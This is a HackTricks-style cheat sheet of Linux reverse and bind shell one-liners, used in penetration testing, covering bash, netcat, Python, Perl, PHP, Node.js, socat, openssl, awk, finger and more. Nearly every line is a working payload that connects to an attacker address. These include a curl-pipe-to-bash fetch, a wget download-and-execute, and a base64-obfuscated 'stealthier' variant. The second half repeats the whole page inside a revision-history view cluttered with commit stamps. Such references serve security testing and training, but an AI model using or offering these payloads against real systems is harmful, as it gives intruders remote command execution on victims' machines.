hacktricks/shells/shells/linux.md

# Shells - Linux

**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)****

## Full TTY

**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**

## Bash | sh

```bash
curl http://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
#Short and bypass (cretdits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell, to get the output execute
exec >&0
```

Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash

### Symbol safe shell

```bash
#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```

### Create in file and execute

```bash
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
```

## Netcat

```bash
nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```

## Telnet

```bash
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```

## Whois

**Attacker**

```bash
while true; do nc -l <port>; done
```

To send the command write it down, press enter and press CTRL+D (to stop STDIN)

**Victim**

```bash
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
```

## Python

```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
```

## Perl

```bash
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```

## Ruby

```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```

## PHP

```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```

## Java

```bash
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

## Ncat

```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
```

## Golang

```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```

## Lua

```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```

## NodeJS

```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "10.17.26.64", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();


or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")

or

-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

or

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```

## OpenSSH

Attacker (Kali)

```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```

Victim

```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```

## **Socat**

[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)

### Bind shell

```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337 
```

### Reverse shell

```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
```

## Awk

```bash
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```

## Finger

**Attacker**

```bash
while true; do nc -l 79; done
```

To send the command write it down, press enter and press CTRL+D (to stop STDIN)

**Victim**

```bash
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
```

## Gawk

```bash
#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}
```

## Xterm

One of the simplest forms of reverse shell is an xterm session.  The following command should be run on the server.  It will try to connect back to you (10.0.0.1) on TCP port 6001.

```bash
xterm -display 10.0.0.1:1
```

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).  One way to do this is with Xnest (to be run on your system):

```bash
Xnest :1
```

You’ll need to authorise the target to connect to you (command also run on your host):

```bash
xhost +targetip
```

## Groovy

by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy

```bash
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

## Bibliography

{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}

{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}

{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								# Shells - Linux
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)****
-												GitBook: [master] 380 pages modified
											
										
										
											2020-10-17 17:35:35 +00:00
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-19 11:54:25 +00:00
+								## Full TTY
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**
-												GitBook: [master] 3 pages modified
											
										
										
											2020-08-19 11:54:25 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								## Bash | sh
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								```bash
-												GitBook: [master] one page modified
											
										
										
											2021-01-24 14:47:59 +00:00
+								curl http://reverse-shell.sh/1.1.1.1:3000 | bash
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
-												GitBook: [master] one page modified
											
										
										
											2020-12-01 17:37:29 +00:00
+								sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
 								exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-30 08:00:11 +00:00
+								#Short and bypass (cretdits to Dikline)
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-30 00:10:09 +00:00
+								(sh)0>/dev/tcp/10.10.10.10/9091
 								#after getting the previous shell, to get the output execute
 								exec >&0
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												GitBook: [master] one page modified
											
										
										
											2020-12-01 17:37:29 +00:00
+								Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:04:11 +00:00
+								### Symbol safe shell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								#If you need a more stable connection do:
-												GitBook: [master] one page modified
											
										
										
											2020-11-05 20:05:40 +00:00
+								bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								#Stealthier method
-												GitBook: [master] one page modified
											
										
										
											2020-11-05 20:05:40 +00:00
+								#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
 								```
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:04:11 +00:00
+								### Create in file and execute
 								```bash
 								echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:28:16 +00:00
+								wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
-												GitBook: [master] one page modified
											
										
										
											2020-11-15 22:04:11 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								## Netcat
 								```bash
 								nc -e /bin/sh <ATTACKER-IP> <PORT>
 								nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
 								rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
 								nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
 								rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
 								```
 								## Telnet
 								```bash
 								telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
 								rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
 								telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
 								rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
 								```
 								## Whois
 								**Attacker**
 								```bash
 								while true; do nc -l <port>; done
 								```
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								To send the command write it down, press enter and press CTRL+D (to stop STDIN)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								**Victim**
 								```bash
 								export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
 								```
 								## Python
 								```bash
 								#Linux
 								export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
 								python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 								#IPv6
 								python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
 								```
 								## Perl
 								```bash
 								perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 								perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 								```
 								## Ruby
 								```bash
 								ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
 								ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 								```
 								## PHP
 								```bash
 								php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
-												GitBook: [master] 5 pages and 12 assets modified
											
										
										
											2021-09-02 21:18:04 +00:00
+								<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
 								## Java
 								```bash
 								r = Runtime.getRuntime()
 								p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 								p.waitFor()
 								```
 								## Ncat
 								```bash
 								victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
 								attacker> ncat -v 10.0.0.22 4444 --ssl
 								```
 								## Golang
 								```bash
 								echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
 								```
 								## Lua
 								```bash
 								#Linux
 								lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
 								#Windows & Linux
 								lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 								```
 								## NodeJS
 								```javascript
 								(function(){
 								    var net = require("net"),
 								        cp = require("child_process"),
 								        sh = cp.spawn("/bin/sh", []);
 								    var client = new net.Socket();
 								    client.connect(8080, "10.17.26.64", function(){
 								        client.pipe(sh.stdin);
 								        sh.stdout.pipe(client);
 								        sh.stderr.pipe(client);
 								    });
 								    return /a/; // Prevents the Node.js application form crashing
 								})();
 								or
 								require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
-												GitBook: [#2836] update

											
										
										
											2021-11-08 23:40:13 +00:00
+								require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								or
 								-var x = global.process.mainModule.require
 								-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
 								or
 								https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 								```
 								## OpenSSH
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								Attacker (Kali)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								```bash
 								openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
 								openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
 								openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
 								```
 								Victim
 								```bash
 								#Linux
 								openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
 								#Windows
 								openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
 								```
 								## **Socat**
 								[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
 								### Bind shell
 								```bash
 								victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
 								attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
 								```
 								### Reverse shell
 								```bash
 								attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
 								victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
 								```
 								## Awk
 								```bash
 								awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 								```
 								## Finger
 								**Attacker**
 								```bash
 								while true; do nc -l 79; done
 								```
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								To send the command write it down, press enter and press CTRL+D (to stop STDIN)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								**Victim**
 								```bash
 								export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
 								export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
 								```
 								## Gawk
 								```bash
 								#!/usr/bin/gawk -f
 								BEGIN {
 								        Port    =       8080
 								        Prompt  =       "bkd> "
 								        Service = "/inet/tcp/" Port "/0/0"
 								        while (1) {
 								                do {
 								                        printf Prompt |& Service
 								                        Service |& getline cmd
 								                        if (cmd) {
 								                                while ((cmd |& getline) > 0)
 								                                        print $0 |& Service
 								                                close(cmd)
 								                        }
 								                } while (cmd != "exit")
 								                close(Service)
 								        }
 								}
 								```
 								## Xterm
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								One of the simplest forms of reverse shell is an xterm session.  The following command should be run on the server.  It will try to connect back to you (10.0.0.1) on TCP port 6001.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								```bash
 								xterm -display 10.0.0.1:1
 								```
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).  One way to do this is with Xnest (to be run on your system):
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								```bash
 								Xnest :1
 								```
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								You’ll need to authorise the target to connect to you (command also run on your host):
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								```bash
 								xhost +targetip
 								```
 								## Groovy
 								by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy
 								```bash
 								String host="localhost";
 								int port=8044;
 								String cmd="cmd.exe";
 								Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 								```
 								## Bibliography
 								{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}
 								{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}
 								{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}
 								{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}